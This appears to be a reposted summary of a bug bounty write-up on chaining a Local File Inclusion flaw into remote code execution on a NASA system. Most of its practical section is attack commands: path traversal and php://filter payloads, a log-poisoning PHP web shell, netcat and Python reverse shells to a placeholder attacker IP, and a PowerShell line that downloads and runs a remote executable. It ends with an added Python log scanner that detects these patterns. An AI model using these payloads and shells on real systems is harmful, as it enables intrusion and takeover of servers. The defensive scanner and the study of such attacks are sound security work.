How I Hacked NASA and Got a P1 on Bugcrowd


0xjin.medium.com

You Should Know:

This article delves into the attacker's mindset and the journey from a Local File Inclusion (LFI) vulnerability to Remote Code Execution (RCE) on a NASA system, which ultimately earned a P1 bounty on Bugcrowd. Below are some practical commands and techniques related to LFI and RCE that you can practice in a controlled environment:

Local File Inclusion (LFI) Exploitation

1. Basic LFI Payload:

http://example.com/index.php?page=../../../../etc/passwd

This payload attempts to read the `/etc/passwd` file on a Linux system.

2. Using PHP Wrappers for LFI:

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

The `php://filter` wrapper returns the `index.php` file base64-encoded instead of executing it, allowing you to read its source code once decoded.

3. Log Poisoning for RCE:

Inject PHP code into a log file that the web server writes (e.g., /var/log/apache2/access.log), then include that log file via the LFI so the server executes the injected code:

http://example.com/index.php?page=../../../../var/log/apache2/access.log

Example of injected PHP code:

<?php system($_GET['cmd']); ?>

Then execute commands via:

http://example.com/index.php?page=../../../../var/log/apache2/access.log&cmd=id

Remote Code Execution (RCE) Commands

1. Reverse Shell via Netcat:

nc -e /bin/sh <ATTACKER_IP> <PORT>

On the attacker’s machine:

nc -lvp <PORT>

2. Python Reverse Shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER_IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

3. Windows Command Execution:

powershell -c "Invoke-WebRequest -Uri http://<ATTACKER_IP>/shell.exe -OutFile C:\Windows\Temp\shell.exe; Start-Process C:\Windows\Temp\shell.exe"

What Undercode Says:

Understanding the techniques used by threat actors, such as LFI to RCE, is crucial for both offensive and defensive cybersecurity practices. Always practice these commands in a legal and controlled environment, such as a lab or CTF platform. Strengthen your systems by:
– Regularly updating software to patch vulnerabilities.
– Implementing input validation and sanitization.
– Monitoring logs for suspicious activities.
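As an added defensive example (not code from the original article), the following Python scanner applies the last recommendation to Apache access logs: it flags the traversal, php:// wrapper and log-file-inclusion patterns shown above, and correlates a PHP tag written into a request header with a later include of the log file, which is the log-poisoning chain described earlier. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote
# Constructed Apache combined-format access log lines (not from the original article).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 128 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log&cmd=id HTTP/1.1" 200 4096 "-" "curl/8.0"
"""

# Client IP, request line and User-Agent from the combined log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Each indicator corresponds to one LFI technique described in the article.
INDICATORS = {
    "traversal": re.compile(r"\.\.[/\\]"),               # ../ or ..\ sequences
    "php_wrapper": re.compile(r"php://", re.I),          # php://filter and similar wrappers
    "log_file_include": re.compile(r"/var/log/", re.I),  # reading a server log back through the include
    "php_tag_in_header": re.compile(r"<\?php", re.I),    # PHP code planted in the log via a request header
}

def decode(value):
    """Percent-decode twice so double-encoded traversal (%252e%252e%252f) is caught too."""
    return unquote(unquote(value))

def classify(entry):
    """Return the indicator names that fire on one parsed entry (dict with 'request' and 'ua')."""
    request = decode(entry["request"])
    hits = [n for n in ("traversal", "php_wrapper", "log_file_include") if INDICATORS[n].search(request)]
    if INDICATORS["php_tag_in_header"].search(entry["ua"]):
        hits.append("php_tag_in_header")
    return hits

def scan_log(text):
    """Map each client IP to the sorted list of indicators seen across all of its requests."""
    per_ip = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        hits = classify(m.groupdict()) if m else []
        if hits:
            per_ip.setdefault(m["ip"], set()).update(hits)
    return {ip: sorted(h) for ip, h in per_ip.items()}

def log_poisoning_suspects(per_ip):
    """Clients that both planted a PHP tag in a header and later included a log file."""
    return sorted(ip for ip, hits in per_ip.items() if {"php_tag_in_header", "log_file_include"} <= set(hits))

if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG)
    print(findings, "log poisoning chain suspects:", log_poisoning_suspects(findings))
```

Running it on the constructed log reports only 10.0.0.9, with all four indicators, and names it as the single log-poisoning suspect.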

For further reading on LFI and RCE, visit:

Practice these commands responsibly to enhance your cybersecurity skills!

References:

Reported By: Abhirup Konwar – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
